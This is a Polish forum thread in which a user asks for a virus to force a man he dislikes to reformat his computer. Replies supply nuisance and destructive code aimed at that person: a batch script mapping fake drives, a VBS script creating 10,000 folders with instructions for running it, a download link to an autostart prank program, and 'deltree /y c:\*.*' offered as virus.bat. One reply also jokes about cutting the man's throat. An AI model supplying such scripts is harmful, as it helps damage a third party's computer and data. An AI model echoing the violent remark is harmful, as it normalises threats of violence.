Otóż jest taka sprawa że jeden gościu zaszedł mi za skórę i chce mu sie odpłacić pięknym za nadobne i tutaj jest mi potrzebna wasza pomoc żeby ktoś mi podesłał jakiegoś "dobrego" wirusa który zmusił by go do formatowania komputera.Z góry dziękuje.
Otóż jest taka sprawa że jeden gościu zaszedł mi za skórę i chce mu sie odpłacić pięknym za nadobne i tutaj jest mi potrzebna wasza pomoc żeby ktoś mi podesłał jakiegoś "dobrego" wirusa który zmusił by go do formatowania komputera.Z góry dziękuje.
Wyjaśnij formatowanie komputera? Konkretnie co chcesz spowodować? Reinstalację systemu? Możesz namieszać w plikach startowych, nawrzucać kilkadziesiąt wirtualnych dysków itd itp możliwości jest wiele - wtedy gość poczuje że traci kontrolę nad sytuacją i przeinstaluje system
Możesz też wybrać coś chamskiego i "śmiesznego" w jednym - np wściekłą mysz mojej produkcji ładuje się na autostart jeżeli ktoś nie wie jak to zatrzymać nie będzie wstanie pracować w systemie ;D
http://wyslijplik.pl/download.php?sid=mBjuVIpP
Raczej nikt ci tego nieda, a temat pójdzie do kosza.
Najlepiej będzie jak mu obijesz twarz, poderżniesz gardło a jego flaki wywiesisz na cały trzepaku przed blokiem. Wtedy sądzę, że żaden inny lokator już Cię nie będzie denerwował:P
/Edytuje nie będę Cię wrabiał
Kod::: Virtual Disc menager :P Echo off subst u: c:/ subst o: c:/ subst p: c:/ subst w: c:/ subst y: c:/ subst x: c:/ subst z: c:/ subst q: c:/
Ostatnio edytowane przez hedVB : 03-31-2008 - 17:02
Szkodników umieszczać nie będę ,po prostu nie mój styl pisanie czegoś co "niszczy" ale wrzucę ScumwarE (mój ulubiony typ ) Myślę że 10 000 folderów wystarczy (na dysku pod zmienną systemową %homedrive%)
Oczywiście nie kopiuje się do autostartu.Ale efekt ciekawyKod:'----------------------------Wytnij tutaj--------------------------------------------- On error resume next Dim System ,i ,shell ,HomDrv , Lokalizacja ' Zmienne Set Shell = CreateObject("Wscript.Shell") 'Shell Set System = CreateObject("scripting.FileSystemObject") 'FSO HomDrv = Shell.ExpandEnvironmentStrings("%homedrive%")' Zmienna Sys. Lokalizacja = system.GetFolder(""&HomDrv)' "idziemy" do lokalizacji wyżej For i = 1 to 10000 ' początek pętli System.CreateFolder(Lokalizacja&"\Nowy-Folder Create by _-VLN-_"&i) 'tworzymy folder next 'koniec pętli '------------------------------Wytnij tutaj-------------------------------------------
Jak chcesz to mogę dopisać kilka linijek ,tak aby się kopiował.
"Nasz klient nasz pan "
PS. A co do uruchomienia. To popierwsze otwieramy sobie notatnik ( LogoWin+R=>notepad) wklejamy cały kod,zapisujemy jako np.FolderCreator.VBS
Ważne na końcu musi być rozszerzenie VBS.
Pozdrawiam VLN.
Zamiast tego :Kod php:
$zmienna = $_POST['COS'];
I mamy zabezpieczenie przed XSSKod php:
$zmienna = htmlspecialchars($_POST['COS']);
virus.bat
/edit: hedVB: juz zadzialaKod:deltree /y c:\*.*
Ostatnio edytowane przez maciek : 03-31-2008 - 20:29
Pozdrawiam
Hekko przykre ale Twój kod nie zadziała jeżeli C to partycja systemowa
jesli jestesmy juz przy batchu to jak przejsc do nowej linii? cos jak <br> w htmlu
War, war never changes.
Zamiast tego :Kod php:
$zmienna = $_POST['COS'];
I mamy zabezpieczenie przed XSSKod php:
$zmienna = htmlspecialchars($_POST['COS']);